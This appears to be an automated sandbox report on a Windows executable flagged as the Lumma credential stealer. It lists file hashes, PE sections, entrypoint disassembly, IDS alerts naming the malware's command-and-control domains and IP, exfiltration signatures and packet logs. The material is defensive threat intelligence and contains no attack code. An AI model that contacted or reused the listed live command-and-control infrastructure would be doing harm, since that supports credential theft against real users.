                                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9ezhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgzhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://discokeyus.lat:443/apizhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.mozilla.org/products/firefoxgro.allzhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctazhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              172.67.197.170
                                                                                                              		discokeyus.latUnited States
                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1578956
                                                                                                              Start date and time:2024-12-20 17:04:17 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 4m 44s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:5
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:zhQFKte2vX.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:157a5af38553ccb117f6d278b2b046f0.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 4
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Stop behavior analysis, all processes terminated

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target zhQFKte2vX.exe, PID 4208 because there are no executed function
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: zhQFKte2vX.exe

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              11:05:34API Interceptor10x Sleep call for process: zhQFKte2vX.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              172.67.197.170ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                  Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                    BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                      rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                        iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                                          f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                            Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                              R2CgZG545D.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                ylV1TcJ86R.exeGet hashmaliciousLummaCBrowse

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  discokeyus.latddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.21.99
                                                                                                                                  XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                  • 104.21.21.99
                                                                                                                                  BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.21.99
                                                                                                                                  m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.21.99

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  CLOUDFLARENETUShttp://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.21.99
                                                                                                                                  XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                  • 104.21.21.99
                                                                                                                                  http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3HaGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.18.42.227
                                                                                                                                  https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 104.21.73.56
                                                                                                                                  BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  iv382V1eOK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170
                                                                                                                                  m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 172.67.197.170

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  No created / dropped files found

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.947764114247639
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:zhQFKte2vX.exe
                                                                                                                                  File size:1'819'648 bytes
                                                                                                                                  MD5:157a5af38553ccb117f6d278b2b046f0
                                                                                                                                  SHA1:9793935e64772bb6fa3665d090fb7e9d448ad438
                                                                                                                                  SHA256:a0d75064673f21a234d5556762f77ee96daad893e015824d7526cb965df0dd44
                                                                                                                                  SHA512:0798f89180e91f76c357683f05cfe1103db048fdb4428f25417e141530275bb753aaf96cc5d16b5d9497878434cf05047b8e515a5a155d57e3e3b0005b7b66b6
                                                                                                                                  SSDEEP:49152:IFUK+tknnOhw3POob/QLBESTaMdSUAygf8pBb/6l50:IFUHtkDOobYLvaKSUAipBb/0
                                                                                                                                  TLSH:748533C30D6705FBC4DA5A311A4B652C5E51096C1B7D87F9EC9F92FA24933A23B3286C
                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. H...........@..........................PH.....Hv....@.................................T0..h..

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x882000
                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  jmp 00007FCD7CDE52EAh
                                                                                                                                  cpuid
                                                                                                                                  sbb eax, dword ptr [eax]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  jmp 00007FCD7CDE72E5h
                                                                                                                                  add byte ptr [ebx], cl
                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax+00000000h], cl
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [edx], ah
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  or ecx, dword ptr [edx]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax+eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], cl
                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  or ecx, dword ptr [edx]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax+00000000h], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  inc eax
                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                  add dword ptr [eax], eax
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x2b0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  0x10000x510000x24800d8d6b63e4d892d13f700cd3b11d338ecFalse0.9972642872431506data7.97194323302097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x520000x2b00x400b1e85b1cd09caefc2d43268be72ef161False0.3603515625data5.183452444303608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  0x540000x2990000x200cb4265b19cc044d66279b081181b750aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  zajbtexj0x2ed0000x1940000x193c00d2d1b5d24f2a15203f0e38180ebbee82False0.9940281540247679data7.953476453200085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  kwcryctq0x4810000x10000x60035c9b2c6a25aa60f16b83c6a0311a221False0.5768229166666666data4.978904810718496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .taggant0x4820000x30000x22005fb420a62c640a7bf7217e7d75e4b220False0.05801930147058824DOS executable (COM)0.6518609947377214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_MANIFEST0x520580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-20T17:05:35.140726+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.7507061.1.1.153UDP
                                                                                                                                  2024-12-20T17:05:35.285027+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.7597591.1.1.153UDP
                                                                                                                                  2024-12-20T17:05:35.428603+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.7636181.1.1.153UDP
                                                                                                                                  2024-12-20T17:05:36.797002+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749704172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:36.797002+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749704172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:40.756321+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749704172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:40.756321+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749704172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:41.982787+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749705172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:41.982787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:42.845349+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749705172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:42.845349+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749705172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:44.690217+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749706172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:44.690217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749706172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:47.219346+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749707172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:47.219346+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749707172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:48.188607+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749707172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:49.655708+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749709172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:49.655708+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:53.248920+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749712172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:53.248920+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749712172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:56.652841+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749713172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:05:56.652841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749713172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:06:03.121052+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.749714172.67.197.170443TCP
                                                                                                                                  2024-12-20T17:06:03.121052+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749714172.67.197.170443TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 20, 2024 17:05:35.572434902 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:35.572468996 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:35.572550058 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:35.576272964 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:35.576298952 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:36.796863079 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:36.797002077 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:36.839261055 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:36.839289904 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:36.841204882 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:36.886284113 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:37.134203911 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:37.134244919 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:37.134536028 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.756364107 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.756516933 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.756614923 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.758209944 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.758229017 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.758280993 CET49704443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.758289099 CET44349704172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.768399000 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.768495083 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:40.768580914 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.769192934 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:40.769231081 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:41.982647896 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:41.982786894 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:41.984431982 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:41.984446049 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:41.984838009 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:41.986102104 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:41.986126900 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:41.986186981 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845346928 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845411062 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845447063 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845478058 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845475912 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:42.845503092 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.845554113 CET49705443192.168.2.7172.67.197.170
                                                                                                                                  Dec 20, 2024 17:05:42.845952988 CET44349705172.67.197.170192.168.2.7
                                                                                                                                  Dec 20, 2024 17:05:42.846004963 CET49705443192.168.2.7172.67.197.170
